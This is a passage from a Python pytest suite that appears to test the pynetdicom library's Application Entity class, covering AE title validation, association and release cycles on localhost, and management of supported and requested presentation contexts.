# "TCP Initialisation Error: [Errno 113] No route to host",
]
assert len([m for m in msgs if m in caplog.text]) == 1
def test_select_timeout_okay(self):
"""Test that using start works OK with timeout."""
# Multiple release/association in a sort time causes an OSError as
# the port is still in use due to the use of select.select() with
# a timeout. Fixed by using socket.shutdown in stop()
for ii in range(3):
self.ae = ae = AE()
ae.acse_timeout = 5
ae.dimse_timeout = 5
ae.network_timeout = 5
ae.add_supported_context(Verification)
scp = ae.start_server(("localhost", 11112), block=False)
ae.add_requested_context(Verification)
assoc = ae.associate("localhost", 11112)
assert assoc.is_established
assoc.release()
assert assoc.is_released
assert not assoc.is_established
scp.shutdown()
def test_aet_bytes_deprecation(self):
"""Test warning if using bytes to set an AE title."""
self.ae = ae = AE()
ae.acse_timeout = 5
ae.dimse_timeout = 5
ae.network_timeout = 5
ae.add_supported_context(Verification)
server = ae.start_server(("localhost", 11112), block=False)
ae.add_requested_context(Verification)
msg = (
r"The use of bytes with 'ae_title' is deprecated, use an ASCII "
r"str instead"
)
with pytest.warns(DeprecationWarning, match=msg):
assoc = ae.associate("localhost", 11112, ae_title=b"BADAE2")
assert assoc.acceptor.ae_title == "BADAE2"
assert assoc.requestor.ae_title == "PYNETDICOM"
server.shutdown()
class TestAEBadAssociation:
def test_raise(self):
"""Test bad associate call"""
ae = AE()
ae.add_requested_context(Verification)
with pytest.raises(TypeError):
ae.associate(1112, 11112)
with pytest.raises(TypeError):
ae.associate("localhost", "1.2.3.4")
def test_invalid_ae_title(self):
"""Test invalid AE.ae_title"""
ae = AE()
ae.add_requested_context(Verification)
msg = r"Invalid 'ae_title' value - must not consist entirely of spaces"
with pytest.raises(ValueError, match=msg):
ae.associate("localhost", 11112, ae_title=" ")
msg = (
r"Invalid 'ae_title' value '\u200b5' "
r"- must only contain ASCII characters"
)
with pytest.raises(ValueError, match=msg):
aet = b"\xe2\x80\x8b\x35".decode("utf8")
ae.associate("localhost", 11112, ae_title=aet)
msg = (
r"Invalid 'ae_title' value '1234567890ABCDEFG' "
r"- must not exceed 16 characters"
)
with pytest.raises(ValueError, match=msg):
ae.associate("localhost", 11112, ae_title="1234567890ABCDEFG")
msg = r"Invalid 'ae_title' value - must not be an empty str"
with pytest.raises(ValueError, match=msg):
ae.associate("localhost", 11112, ae_title="")
msg = (
r"Invalid 'ae_title' value 'TEST\\ME' - must not contain control "
r"characters or backslashes"
)
with pytest.raises(ValueError, match=msg):
ae.associate("localhost", 11112, ae_title="TEST\\ME")
msg = r"'ae_title' must be str, not 'int'"
with pytest.raises(TypeError, match=msg):
ae.associate("localhost", 11112, ae_title=12345)
class TestAEGoodMiscSetters:
def setup(self):
self.ae = None
def teardown(self):
if self.ae:
self.ae.shutdown()
def test_ae_title_good(self):
"""Check AE title change produces good value"""
ae = AE()
ae.ae_title = " TEST "
assert ae.ae_title == " TEST "
ae.ae_title = " TEST"
assert ae.ae_title == " TEST"
ae.ae_title = "a TES"
assert ae.ae_title == "a TES"
ae.ae_title = "a TEST"
assert ae.ae_title == "a TEST"
def test_aet_bytes_deprecation(self):
"""Test warning if using bytes to set an AE title."""
msg = (
r"The use of bytes with 'ae_title' is deprecated, use an ASCII "
r"str instead"
)
with pytest.warns(DeprecationWarning, match=msg):
ae = AE(b"BADAE")
assert ae.ae_title == "BADAE"
def test_implementation(self):
"""Check the implementation version name and class UID setters"""
ae = AE()
ae.implementation_version_name = None
assert ae.implementation_version_name is None
ae.implementation_class_uid = "1.2.3"
assert ae.implementation_class_uid == "1.2.3"
def test_max_assoc_good(self):
"""Check AE maximum association change produces good value"""
ae = AE()
ae.maximum_associations = -10
assert ae.maximum_associations == 1
ae.maximum_associations = ["a"]
assert ae.maximum_associations == 1
ae.maximum_associations = "10"
assert ae.maximum_associations == 1
ae.maximum_associations = 0
assert ae.maximum_associations == 1
ae.maximum_associations = 5
assert ae.maximum_associations == 5
def test_max_pdu_good(self):
"""Check AE maximum pdu size change produces good value"""
ae = AE()
ae.maximum_pdu_size = -10
assert ae.maximum_pdu_size == 16382
ae.maximum_pdu_size = 0
assert ae.maximum_pdu_size == 0
ae.maximum_pdu_size = 5000
assert ae.maximum_pdu_size == 5000
def test_require_calling_aet(self):
"""Test AE.require_calling_aet"""
self.ae = ae = AE()
ae.acse_timeout = 5
ae.dimse_timeout = 5
ae.network_timeout = 5
ae.add_supported_context(Verification)
scp = ae.start_server(("localhost", 11112), block=False)
ae.add_requested_context(Verification)
assoc = ae.associate("localhost", 11112)
assert assoc.is_established
assoc.release()
assert assoc.is_released
assert not assoc.is_established
ae.require_calling_aet = ["MYAE"]
assert ae.require_calling_aet == ["MYAE"]
assoc = ae.associate("localhost", 11112)
assert assoc.is_rejected
ae.require_calling_aet = ["PYNETDICOM"]
assert ae.require_calling_aet == ["PYNETDICOM"]
assoc = ae.associate("localhost", 11112)
assert assoc.is_established
assoc.release()
msg = r"Invalid 'require_calling_aet' value - must not be an empty str"
with pytest.raises(ValueError, match=msg):
ae.require_calling_aet = [""]
assert ae.require_calling_aet == ["PYNETDICOM"]
assoc = ae.associate("localhost", 11112)
assert assoc.is_established
assoc.release()
scp.shutdown()
def test_aec_bytes_deprecation(self):
"""Test warning if using bytes to set an AE title."""
ae = AE()
msg = (
r"The use of a list of bytes with 'require_calling_aet' is "
r"deprecated, use a list of ASCII str instead"
)
with pytest.warns(DeprecationWarning, match=msg):
ae.require_calling_aet = [b"BADAE", "GOODAE"]
assert ae.require_calling_aet == ["BADAE", "GOODAE"]
def test_require_called_aet(self):
"""Test AE.require_called_aet"""
self.ae = ae = AE()
ae.acse_timeout = 5
ae.dimse_timeout = 5
ae.network_timeout = 5
ae.add_supported_context(Verification)
scp = ae.start_server(("localhost", 11112), block=False)
ae.add_requested_context(Verification)
assoc = ae.associate("localhost", 11112)
assert assoc.is_established
assoc.release()
assert assoc.is_released
assert not assoc.is_established
ae.require_called_aet = True
assert ae.require_called_aet is True
assoc = ae.associate("localhost", 11112)
assert assoc.is_rejected
assoc = ae.associate("localhost", 11112, ae_title="PYNETDICOM")
assert assoc.is_established
assoc.release()
scp.shutdown()
def test_req_calling_aet(self):
"""Check AE require calling aet change produces good value"""
ae = AE()
ae.require_calling_aet = ["10", "asdf"]
assert ae.require_calling_aet == ["10", "asdf"]
def test_req_called_aet(self):
"""Check AE require called aet change produces good value"""
ae = AE()
assert ae.require_called_aet is False
ae.require_called_aet = True
assert ae.require_called_aet is True
ae.require_called_aet = False
assert ae.require_called_aet is False
def test_string_output(self):
"""Test string output"""
ae = AE()
ae.add_requested_context(Verification)
ae.require_calling_aet = ["something"]
ae.require_called_aet = True
assert "Explicit VR" in ae.__str__()
assert "Verification" in ae.__str__()
assert "0/10" in ae.__str__()
assert "something" in ae.__str__()
assert "Require called AE title: True" in ae.__str__()
ae.supported_contexts = StoragePresentationContexts
assert "CT Image" in ae.__str__()
ae = AE()
ae.add_requested_context(Verification)
assert "None" in ae.__str__()
self.ae = ae = AE()
ae.acse_timeout = 5
ae.dimse_timeout = 5
ae.network_timeout = 5
ae.add_supported_context(Verification)
scp = ae.start_server(("localhost", 11112), block=False)
ae.add_requested_context(Verification)
assoc = ae.associate("localhost", 11112)
assert assoc.is_established
assert assoc.is_established
assert "Explicit VR" in ae.__str__()
assert "Peer" in ae.__str__()
assoc.release()
assert assoc.is_released
assert not assoc.is_established
scp.shutdown()
def test_init_implementation_class(self):
"""Test the default implementation class uid"""
ae = AE()
assert ae.implementation_class_uid == PYNETDICOM_IMPLEMENTATION_UID
def test_init_implementation_version(self):
"""Test the default implementation version name"""
ae = AE()
assert ae.implementation_version_name == PYNETDICOM_IMPLEMENTATION_VERSION
def test_implementation_version(self):
"""Test implementation_version_name"""
ae = AE()
ae.implementation_version_name = None
assert ae.implementation_version_name is None
ae.implementation_version_name = " "
assert ae.implementation_version_name == " "
msg = "'implementation_version_name' must be str or None, not 'int'"
with pytest.raises(TypeError, match=msg):
ae.implementation_version_name = 1234
msg = "Invalid 'implementation_version_name' value - must not be an empty str"
with pytest.raises(ValueError, match=msg):
ae.implementation_version_name = ""
assert ae.implementation_version_name == " "
def test_implementation_class(self):
"""Test implementation_class_uid"""
ae = AE()
ae.implementation_class_uid = "12.3.4"
assert isinstance(ae.implementation_class_uid, UID)
assert ae.implementation_class_uid == UID("12.3.4")
msg = (
r"'implementation_class_uid' must be str, bytes or UID, not " r"'NoneType'"
)
with pytest.raises(TypeError, match=msg):
ae.implementation_class_uid = None
assert ae.implementation_class_uid == UID("12.3.4")
msg = r"Invalid 'implementation_class_uid' value - must not be an " r"empty str"
with pytest.raises(ValueError, match=msg):
ae.implementation_class_uid = ""
msg = r"Invalid 'implementation_class_uid' value '1.2.04'"
with pytest.raises(ValueError, match=msg):
ae.implementation_class_uid = "1.2.04"
assert ae.implementation_class_uid == UID("12.3.4")
class TestAEBadInitialisation:
def test_invalid_ae_title(self):
"""Test invalid AE.ae_title"""
msg = r"Invalid 'ae_title' value - must not consist entirely of spaces"
with pytest.raises(ValueError, match=msg):
AE(ae_title=" ")
msg = (
r"Invalid 'ae_title' value '\u200b5' "
r"- must only contain ASCII characters"
)
with pytest.raises(ValueError, match=msg):
AE(ae_title=b"\xe2\x80\x8b\x35".decode("utf8"))
msg = (
r"Invalid 'ae_title' value '1234567890ABCDEFG' "
r"- must not exceed 16 characters"
)
with pytest.raises(ValueError, match=msg):
AE(ae_title="1234567890ABCDEFG")
msg = r"Invalid 'ae_title' value - must not be an empty str"
with pytest.raises(ValueError, match=msg):
AE(ae_title="")
msg = (
r"Invalid 'ae_title' value 'TEST\\ME' - must not contain control "
r"characters or backslashes"
)
with pytest.raises(ValueError, match=msg):
AE(ae_title="TEST\\ME")
msg = r"'ae_title' must be str, not 'NoneType'"
with pytest.raises(TypeError, match=msg):
AE(ae_title=None)
class TestAE_GoodExit:
def setup(self):
"""Run prior to each test"""
self.ae = None
def teardown(self):
"""Clear any active threads"""
if self.ae:
self.ae.shutdown()
def test_ae_release_assoc(self):
"""Association releases OK"""
self.ae = ae = AE()
ae.acse_timeout = 5
ae.dimse_timeout = 5
ae.network_timeout = 5
ae.add_supported_context(Verification)
scp = ae.start_server(("localhost", 11112), block=False)
ae.add_requested_context(Verification)
# Test N associate/release cycles
for ii in range(5):
assoc = ae.associate("localhost", 11112)
assert assoc.is_established
assoc.release()
assert not assoc.is_established
assert not assoc.is_aborted
assert assoc.is_released
assert not assoc.is_rejected
scp.shutdown()
def test_ae_aborts_assoc(self):
"""Association aborts OK"""
self.ae = ae = AE()
ae.acse_timeout = 5
ae.dimse_timeout = 5
ae.network_timeout = 5
ae.add_supported_context(Verification)
scp = ae.start_server(("localhost", 11112), block=False)
ae.add_requested_context(Verification)
# Test N associate/abort cycles
for ii in range(5):
assoc = ae.associate("localhost", 11112)
assert assoc.is_established
assoc.abort()
assert not assoc.is_established
assert assoc.is_aborted
assert not assoc.is_released
assert not assoc.is_rejected
scp.shutdown()
class TestAESupportedPresentationContexts:
"""Tests for AE's presentation contexts when acting as an SCP"""
def setup(self):
self.ae = AE()
def test_add_supported_context_str(self):
"""Tests for AE.add_supported_context using str."""
self.ae.add_supported_context("1.2.840.10008.1.1")
context = self.ae.supported_contexts[0]
assert context.abstract_syntax == "1.2.840.10008.1.1"
assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES
assert context.context_id is None
def test_add_supported_context_sop_class(self):
"""Tests for AE.add_supported_context using SOPClass."""
self.ae.add_supported_context(RTImageStorage)
context = self.ae.supported_contexts[0]
assert context.abstract_syntax == "1.2.840.10008.5.1.4.1.1.481.1"
assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES
def test_add_supported_context_uid(self):
"""Tests for AE.add_supported_context using UID."""
self.ae.add_supported_context(UID("1.2.840.10008.1.1"))
context = self.ae.supported_contexts[0]
assert context.abstract_syntax == "1.2.840.10008.1.1"
assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES
def test_add_supported_context_duplicate(self):
"""Tests for AE.add_supported_context using a duplicate UID."""
self.ae.add_supported_context(UID("1.2.840.10008.1.1"))
self.ae.add_supported_context(UID("1.2.840.10008.1.1"))
contexts = self.ae.supported_contexts
assert len(contexts) == 1
assert contexts[0].abstract_syntax == "1.2.840.10008.1.1"
assert contexts[0].transfer_syntax == DEFAULT_TRANSFER_SYNTAXES
def test_add_supported_context_transfer_single(self):
"""Test adding a single transfer syntax without a list"""
self.ae.add_supported_context("1.2", "1.3")
contexts = self.ae.supported_contexts
assert len(contexts) == 1
assert contexts[0].abstract_syntax == "1.2"
assert contexts[0].transfer_syntax == ["1.3"]
self.ae.add_supported_context("1.2", UID("1.4"))
contexts = self.ae.supported_contexts
assert len(contexts) == 1
assert contexts[0].abstract_syntax == "1.2"
assert contexts[0].transfer_syntax == ["1.3", "1.4"]
def test_add_supported_context_duplicate_transfer(self):
"""Test adding duplicate transfer syntaxes."""
self.ae.add_supported_context("1.2", ["1.3", "1.3"])
contexts = self.ae.supported_contexts
assert len(contexts) == 1
assert contexts[0].abstract_syntax == "1.2"
assert contexts[0].transfer_syntax == ["1.3"]
self.ae.supported_contexts = []
self.ae.add_supported_context("1.2.840.10008.1.1")
self.ae.add_supported_context("1.2.840.10008.1.1")
contexts = self.ae.supported_contexts
assert len(contexts) == 1
assert contexts[0].abstract_syntax == "1.2.840.10008.1.1"
assert contexts[0].transfer_syntax == DEFAULT_TRANSFER_SYNTAXES
self.ae.supported_contexts = []
self.ae.add_supported_context("1.2.840.10008.1.1")
self.ae.add_supported_context(
"1.2.840.10008.1.1", [DEFAULT_TRANSFER_SYNTAXES[0]]
)
contexts = self.ae.supported_contexts
assert len(contexts) == 1
assert contexts[0].abstract_syntax == "1.2.840.10008.1.1"
assert contexts[0].transfer_syntax == DEFAULT_TRANSFER_SYNTAXES
def test_add_supported_context_duplicate_multi(self):
"""Tests for AE.add_supported_context using a duplicate UID."""
self.ae.add_supported_context(
"1.2.840.10008.1.1", [DEFAULT_TRANSFER_SYNTAXES[0]]
)
self.ae.add_supported_context(
"1.2.840.10008.1.1", DEFAULT_TRANSFER_SYNTAXES[1:]
)
contexts = self.ae.supported_contexts
assert len(contexts) == 1
assert contexts[0].abstract_syntax == "1.2.840.10008.1.1"
assert contexts[0].transfer_syntax == DEFAULT_TRANSFER_SYNTAXES
def test_add_supported_context_private_abs(self):
"""Test AE.add_supported_context with a private abstract syntax"""
self.ae.add_supported_context("1.2.3.4")
contexts = self.ae.supported_contexts
assert len(contexts) == 1
assert contexts[0].abstract_syntax == "1.2.3.4"
assert contexts[0].transfer_syntax == DEFAULT_TRANSFER_SYNTAXES
def test_add_supported_context_private_tran(self):
"""Test AE.add_supported_context with a private transfer syntax"""
self.ae.add_supported_context("1.2.3.4", ["1.2.3", "1.2.840.10008.1.1"])
contexts = self.ae.supported_contexts
assert len(contexts) == 1
assert contexts[0].abstract_syntax == "1.2.3.4"
assert contexts[0].transfer_syntax == ["1.2.3", "1.2.840.10008.1.1"]
def test_add_supported_context_more_128(self):
"""Test adding more than 128 presentation contexts"""
for ii in range(300):
self.ae.add_supported_context(str(ii))
contexts = self.ae.supported_contexts
assert len(contexts) == 300
def test_supported_contexts_setter(self):
"""Test the AE.supported_contexts property setter."""
context = build_context("1.2.840.10008.1.1")
self.ae.supported_contexts = [context]
contexts = self.ae.supported_contexts
assert len(contexts) == 1
assert context.abstract_syntax == "1.2.840.10008.1.1"
assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES
assert context.context_id is None
def test_supported_contexts_empty(self):
"""Test the setting supported_contexts to an empty list."""
context = build_context("1.2.840.10008.1.1")
self.ae.supported_contexts = [context]
assert len(self.ae.supported_contexts) == 1
self.ae.supported_contexts = []
assert len(self.ae.supported_contexts) == 0
def test_supported_contexts_setter_raises(self):
"""Test the AE.supported_contexts property raises if not context."""
with pytest.raises(ValueError):
self.ae.supported_contexts = ["1.2.3"]
def test_supported_contexts_sorted(self):
"""Test that the supported_contexts returns contexts in order."""
self.ae.add_supported_context("1.2.3.4")
self.ae.add_supported_context("1.2.3.5")
asyntaxes = [cntx.abstract_syntax for cntx in self.ae.supported_contexts]
assert asyntaxes == ["1.2.3.4", "1.2.3.5"]
self.ae.add_supported_context("0.1.2.3")
self.ae.add_supported_context("2.1.2.3")
asyntaxes = [cntx.abstract_syntax for cntx in self.ae.supported_contexts]
assert asyntaxes == ["0.1.2.3", "1.2.3.4", "1.2.3.5", "2.1.2.3"]
def test_supported_contexts_more_128(self):
"""Test setting supported_contexts with more than 128 contexts."""
contexts = []
for ii in range(300):
contexts.append(build_context(str(ii)))
self.ae.supported_contexts = contexts
assert len(self.ae.supported_contexts) == 300
def test_remove_supported_context_str(self):
"""Tests for AE.remove_supported_context using str."""
self.ae.add_supported_context("1.2.840.10008.1.1")
context = self.ae.supported_contexts[0]
assert context.abstract_syntax == "1.2.840.10008.1.1"
assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES
self.ae.remove_supported_context("1.2.840.10008.1.1")
assert len(self.ae.supported_contexts) == 0
# Test multiple
self.ae.add_supported_context("1.2.840.10008.1.1")
self.ae.add_supported_context("1.2.840.10008.1.4", ["1.2.3.4"])
assert len(self.ae.supported_contexts) == 2
self.ae.remove_supported_context("1.2.840.10008.1.1")
assert len(self.ae.supported_contexts) == 1
for context in self.ae.supported_contexts:
assert context.abstract_syntax != "1.2.840.10008.1.1"
def test_remove_supported_context_uid(self):
"""Tests for AE.remove_supported_context using UID."""
self.ae.add_supported_context("1.2.840.10008.1.1")
context = self.ae.supported_contexts[0]
assert context.abstract_syntax == "1.2.840.10008.1.1"
assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES
self.ae.remove_supported_context(UID("1.2.840.10008.1.1"))
assert len(self.ae.supported_contexts) == 0
def test_remove_supported_context_sop_class(self):
"""Tests for AE.remove_supported_context using SOPClass."""
self.ae.add_supported_context(RTImageStorage)
context = self.ae.supported_contexts[0]
assert context.abstract_syntax == "1.2.840.10008.5.1.4.1.1.481.1"
assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES
self.ae.remove_supported_context(RTImageStorage)
assert len(self.ae.supported_contexts) == 0
def test_remove_supported_context_default(self):
"""Tests for AE.remove_supported_context with default transfers."""
self.ae.add_supported_context("1.2.840.10008.1.1")
context = self.ae.supported_contexts[0]
assert context.abstract_syntax == "1.2.840.10008.1.1"
assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES
assert len(context.transfer_syntax) == 4
self.ae.remove_supported_context("1.2.840.10008.1.1")
assert len(self.ae.supported_contexts) == 0
def test_remove_supported_context_single_transfer(self):
"""Tests for AE.remove_supported_context with single transfer."""
self.ae.add_supported_context("1.2.840.10008.1.1")
context = self.ae.supported_contexts[0]
assert context.abstract_syntax == "1.2.840.10008.1.1"
assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES
assert len(context.transfer_syntax) == 4
self.ae.remove_supported_context(
"1.2.840.10008.1.1", DEFAULT_TRANSFER_SYNTAXES[0]
)
context = self.ae.supported_contexts[0]
assert context.abstract_syntax == "1.2.840.10008.1.1"
assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES[1:]
def test_remove_supported_context_partial(self):
"""Tests for AE.remove_supported_context with partial transfers."""
# Test singular
self.ae.add_supported_context("1.2.840.10008.1.1")
context = self.ae.supported_contexts[0]
assert context.abstract_syntax == "1.2.840.10008.1.1"
assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES
assert len(context.transfer_syntax) == 4
self.ae.remove_supported_context("1.2.840.10008.1.1", ["1.2.840.10008.1.2"])
assert len(self.ae.supported_contexts) == 1
context = self.ae.supported_contexts[0]
assert len(context.transfer_syntax) == 3
assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES[1:]
assert context.abstract_syntax == "1.2.840.10008.1.1"
# Test multiple
self.ae.add_supported_context("1.2.840.10008.1.1")
self.ae.add_supported_context(RTImageStorage)
self.ae.remove_supported_context("1.2.840.10008.1.1", ["1.2.840.10008.1.2"])
assert len(self.ae.supported_contexts) == 2
context = self.ae.supported_contexts[0]
assert len(context.transfer_syntax) == 3
assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES[1:]
assert context.abstract_syntax == "1.2.840.10008.1.1"
assert (
self.ae.supported_contexts[1].transfer_syntax == DEFAULT_TRANSFER_SYNTAXES
)
def test_remove_supported_context_all(self):
"""Tests for AE.remove_supported_context with all transfers."""
self.ae.add_supported_context("1.2.840.10008.1.1")
context = self.ae.supported_contexts[0]
assert context.abstract_syntax == "1.2.840.10008.1.1"
assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES
assert len(context.transfer_syntax) == 4
# Test singular
self.ae.remove_supported_context("1.2.840.10008.1.1", DEFAULT_TRANSFER_SYNTAXES)
assert len(self.ae.supported_contexts) == 0
# Test multiple
self.ae.add_supported_context("1.2.840.10008.1.1")
self.ae.add_supported_context(RTImageStorage)
self.ae.remove_supported_context("1.2.840.10008.1.1", DEFAULT_TRANSFER_SYNTAXES)
context = self.ae.supported_contexts[0]
assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES
assert context.abstract_syntax == "1.2.840.10008.5.1.4.1.1.481.1"
def test_remove_supported_context_all_plus(self):
"""Test remove_supported_context with extra transfers"""
tsyntax = DEFAULT_TRANSFER_SYNTAXES[:]
tsyntax.append("1.2.3")
self.ae.add_supported_context("1.2.840.10008.1.1")
context = self.ae.supported_contexts[0]
assert context.abstract_syntax == "1.2.840.10008.1.1"
assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES
assert len(context.transfer_syntax) == 4
self.ae.remove_supported_context("1.2.840.10008.1.1", tsyntax)
assert len(self.ae.supported_contexts) == 0
def test_scu_role(self):
"""Test add_supported_context with scu_role parameter."""
self.ae.add_supported_context("1.2.3")
context = self.ae.supported_contexts[0]
assert context.scu_role is None
assert context.scp_role is None
self.ae.supported_context = []
self.ae.add_supported_context("1.2.3", scu_role=None)
context = self.ae.supported_contexts[0]
assert context.scu_role is None
assert context.scp_role is None
self.ae.supported_context = []
self.ae.add_supported_context("1.2.3", scu_role=True)
context = self.ae.supported_contexts[0]
assert context.scu_role is True
assert context.scp_role is None
self.ae.supported_context = []
self.ae.add_supported_context("1.2.3", scu_role=False)
context = self.ae.supported_contexts[0]
assert context.scu_role is False
assert context.scp_role is None
def test_scu_role_update(self):
"""Test updating add_supported_context with scu_role parameter."""
self.ae.add_supported_context("1.2.3")
context = self.ae.supported_contexts[0]
assert context.scu_role is None
assert context.scp_role is None
self.ae.add_supported_context("1.2.3", scu_role=None)
context = self.ae.supported_contexts[0]
assert context.scu_role is None
assert context.scp_role is None
self.ae.add_supported_context("1.2.3", scu_role=True)
context = self.ae.supported_contexts[0]
assert context.scu_role is True
assert context.scp_role is None
self.ae.add_supported_context("1.2.3", scu_role=False)
context = self.ae.supported_contexts[0]
assert context.scu_role is False
assert context.scp_role is None
def test_scu_role_raises(self):
"""Test add_supported_context raises if scu_role wrong type."""
with pytest.raises(TypeError, match=""):
self.ae.add_supported_context("1.2.3", scu_role="abc")
assert self.ae.supported_contexts == []
def test_scp_role(self):
"""Test add_supported_context with scu_role parameter."""
self.ae.add_supported_context("1.2.3")
context = self.ae.supported_contexts[0]
assert context.scu_role is None
assert context.scp_role is None
self.ae.supported_context = []
self.ae.add_supported_context("1.2.3", scp_role=None)
context = self.ae.supported_contexts[0]
assert context.scu_role is None
assert context.scp_role is None
self.ae.supported_context = []
self.ae.add_supported_context("1.2.3", scp_role=True)
context = self.ae.supported_contexts[0]
assert context.scu_role is None
assert context.scp_role is True
self.ae.supported_context = []
self.ae.add_supported_context("1.2.3", scp_role=False)
context = self.ae.supported_contexts[0]
assert context.scu_role is None
assert context.scp_role is False
def test_scp_role_update(self):
"""Test updating add_supported_context with scp_role parameter."""
self.ae.add_supported_context("1.2.3")
context = self.ae.supported_contexts[0]
assert context.scu_role is None
assert context.scp_role is None
self.ae.add_supported_context("1.2.3", scp_role=None)
context = self.ae.supported_contexts[0]
assert context.scu_role is None
assert context.scp_role is None
self.ae.add_supported_context("1.2.3", scp_role=True)
context = self.ae.supported_contexts[0]
assert context.scu_role is None
assert context.scp_role is True
self.ae.add_supported_context("1.2.3", scp_role=False)
context = self.ae.supported_contexts[0]
assert context.scu_role is None
assert context.scp_role is False
def test_scp_role_raises(self):
"""Test add_supported_context raises if scp_role wrong type."""
with pytest.raises(TypeError, match=""):
self.ae.add_supported_context("1.2.3", scp_role="abc")
assert self.ae.supported_contexts == []
class TestAERequestedPresentationContexts:
"""Tests for AE's presentation contexts when acting as an SCU"""
def setup(self):
self.ae = AE()
def test_add_requested_context_str(self):
"""Tests for AE.add_requested_context using str."""
self.ae.add_requested_context("1.2.840.10008.1.1")
context = self.ae.requested_contexts[0]
assert context.abstract_syntax == "1.2.840.10008.1.1"
assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES
assert context.context_id is None
def test_add_requested_context_sop_class(self):
"""Tests for AE.add_requested_context using SOPClass."""
self.ae.add_requested_context(RTImageStorage)
context = self.ae.requested_contexts[0]
assert context.abstract_syntax == "1.2.840.10008.5.1.4.1.1.481.1"
assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES
def test_add_requested_context_uid(self):
"""Tests for AE.add_requested_context using UID."""
self.ae.add_requested_context(UID("1.2.840.10008.1.1"))
context = self.ae.requested_contexts[0]
assert context.abstract_syntax == "1.2.840.10008.1.1"
assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES
def test_add_requested_context_duplicate(self):
"""Test AE.add_requested_context using a duplicate UID."""
self.ae.add_requested_context(UID("1.2.840.10008.1.1"))
self.ae.add_requested_context(UID("1.2.840.10008.1.1"))
contexts = self.ae.requested_contexts
assert len(contexts) == 2
assert contexts[0].abstract_syntax == "1.2.840.10008.1.1"
assert contexts[0].transfer_syntax == DEFAULT_TRANSFER_SYNTAXES
assert contexts[1].abstract_syntax == "1.2.840.10008.1.1"
assert contexts[1].transfer_syntax == DEFAULT_TRANSFER_SYNTAXES
def test_add_requested_context_duplicate_multi(self):
"""Tests for AE.add_requested_context using a duplicate UID."""
self.ae.add_requested_context(
"1.2.840.10008.1.1", [DEFAULT_TRANSFER_SYNTAXES[0]]
)
self.ae.add_requested_context(
"1.2.840.10008.1.1", DEFAULT_TRANSFER_SYNTAXES[1:]
)
contexts = self.ae.requested_contexts
assert len(contexts) == 2
assert contexts[0].abstract_syntax == "1.2.840.10008.1.1"
assert contexts[0].transfer_syntax == [DEFAULT_TRANSFER_SYNTAXES[0]]
assert contexts[1].abstract_syntax == "1.2.840.10008.1.1"
assert contexts[1].transfer_syntax == DEFAULT_TRANSFER_SYNTAXES[1:]
def test_add_supported_context_transfer_single(self):
"""Test adding a single transfer syntax without a list"""
self.ae.add_requested_context("1.2", "1.3")
contexts = self.ae.requested_contexts
assert len(contexts) == 1
assert contexts[0].abstract_syntax == "1.2"
assert contexts[0].transfer_syntax == ["1.3"]
self.ae.add_requested_context("1.2", UID("1.4"))
contexts = self.ae.requested_contexts
assert len(contexts) == 2
assert contexts[1].abstract_syntax == "1.2"
assert contexts[1].transfer_syntax == ["1.4"]
def test_add_requested_context_duplicate_transfer(self):
"""Test add_requested_context using duplicate transfer syntaxes"""
self.ae.add_requested_context("1.2", ["1.3", "1.3"])
contexts = self.ae.requested_contexts
assert contexts[0].transfer_syntax == ["1.3"]
def test_add_requested_context_private_abs(self):
"""Test AE.add_requested_context with a private abstract syntax"""
self.ae.add_requested_context("1.2.3.4")
contexts = self.ae.requested_contexts
assert len(contexts) == 1
assert contexts[0].abstract_syntax == "1.2.3.4"
assert contexts[0].transfer_syntax == DEFAULT_TRANSFER_SYNTAXES
def test_add_requested_context_private_tran(self):
"""Test AE.add_requested_context with a private transfer syntax"""
self.ae.add_requested_context("1.2.3.4", ["1.2.3", "1.2.840.10008.1.1"])
contexts = self.ae.requested_contexts
assert len(contexts) == 1
assert contexts[0].abstract_syntax == "1.2.3.4"
assert contexts[0].transfer_syntax == ["1.2.3", "1.2.840.10008.1.1"]
def test_add_requested_context_more_128_raises(self):
"""Test adding more than 128 presentation contexts"""
for ii in range(128):
self.ae.add_requested_context(str(ii))
assert len(self.ae.requested_contexts) == 128
with pytest.raises(ValueError):
self.ae.add_requested_context("129")
assert len(self.ae.requested_contexts) == 128
def test_requested_contexts_setter(self):
"""Test the AE.requested_contexts property setter."""
context = build_context("1.2.840.10008.1.1")
self.ae.requested_contexts = [context]
contexts = self.ae.requested_contexts
assert len(contexts) == 1
assert context.abstract_syntax == "1.2.840.10008.1.1"
assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES
assert context.context_id is None
def test_requested_contexts_empty(self):
"""Test the setting requested_contexts to an empty list."""
context = build_context("1.2.840.10008.1.1")
self.ae.requested_contexts = [context]
assert len(self.ae.requested_contexts) == 1
self.ae.requested_contexts = []
assert len(self.ae.requested_contexts) == 0
def test_requested_contexts_setter_raises(self):
"""Test the AE.requested_contexts property raises if not context."""
with pytest.raises(ValueError):
self.ae.requested_contexts = ["1.2.3"]
def test_requested_contexts_not_sorted(self):
"""Test that requested_contexts returns contexts in supplied order."""
self.ae.add_requested_context("1.2.3.4")
self.ae.add_requested_context("1.2.3.5")
asyntaxes = [cntx.abstract_syntax for cntx in self.ae.requested_contexts]
assert asyntaxes == ["1.2.3.4", "1.2.3.5"]
self.ae.add_requested_context("0.1.2.3")
self.ae.add_requested_context("2.1.2.3")
asyntaxes = [cntx.abstract_syntax for cntx in self.ae.requested_contexts]
assert asyntaxes == ["1.2.3.4", "1.2.3.5", "0.1.2.3", "2.1.2.3"]
def test_requested_contexts_more_128(self):
"""Test setting requested_contexts with more than 128 contexts."""
